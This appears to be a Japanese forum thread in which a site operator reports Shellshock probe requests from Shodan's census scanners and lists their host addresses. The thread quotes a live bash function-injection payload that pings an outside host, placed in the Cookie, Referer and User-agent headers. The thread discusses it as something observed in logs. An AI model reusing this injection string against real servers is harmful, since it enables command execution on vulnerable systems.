アカウント名:
パスワード:
198.20.69.74(census1.shodan.io)から、
GET / HTTP/1.1Cookie: () { :; }; /bin/ping -c 1 104.131.0.69Referer: () { :; }; /bin/ping -c 1 104.131.0.69User-agent: () { :; }; /bin/ping -c 1 104.131.0.69
などというのがきてます。
104.131.0.69は hello.data.shodan.io だそうです。ちなみに
census1.shodan.io 198.20.69.74census2.shodan.io 198.20.69.98census3.shodan.io 198.20.70.114census4.shodan.io 198.20.99.130census5.shodan.io 93.120.27.62census6.shodan.io 66.240.236.119census7.shodan.io
なるほど。その手の変数名をつかうと、より効果的に攻撃出来るんですね。
より多くのコメントがこの議論にあるかもしれませんが、JavaScriptが有効ではない環境を使用している場合、クラシックなコメントシステム(D1)に設定を変更する必要があります。
身近な人の偉大さは半減する -- あるアレゲ人
早速shodanが探り入れてきてます? (スコア:3, 参考になる)
198.20.69.74(census1.shodan.io)から、
GET / HTTP/1.1
Cookie: () { :; }; /bin/ping -c 1 104.131.0.69
Referer: () { :; }; /bin/ping -c 1 104.131.0.69
User-agent: () { :; }; /bin/ping -c 1 104.131.0.69
などというのがきてます。
104.131.0.69は hello.data.shodan.io だそうです。
ちなみに
census1.shodan.io 198.20.69.74
census2.shodan.io 198.20.69.98
census3.shodan.io 198.20.70.114
census4.shodan.io 198.20.99.130
census5.shodan.io 93.120.27.62
census6.shodan.io 66.240.236.119
census7.shodan.io
Re: (スコア:0)
なるほど。その手の変数名をつかうと、より効果的に攻撃出来るんですね。
Re:早速shodanが探り入れてきてます? (スコア:0)
Apacheのmod_envとか、Appサーバーとの連携で環境変数つかってたりするのも狙われるわけだ。
なるほど、こういう攻撃方法を考えつくわけか…。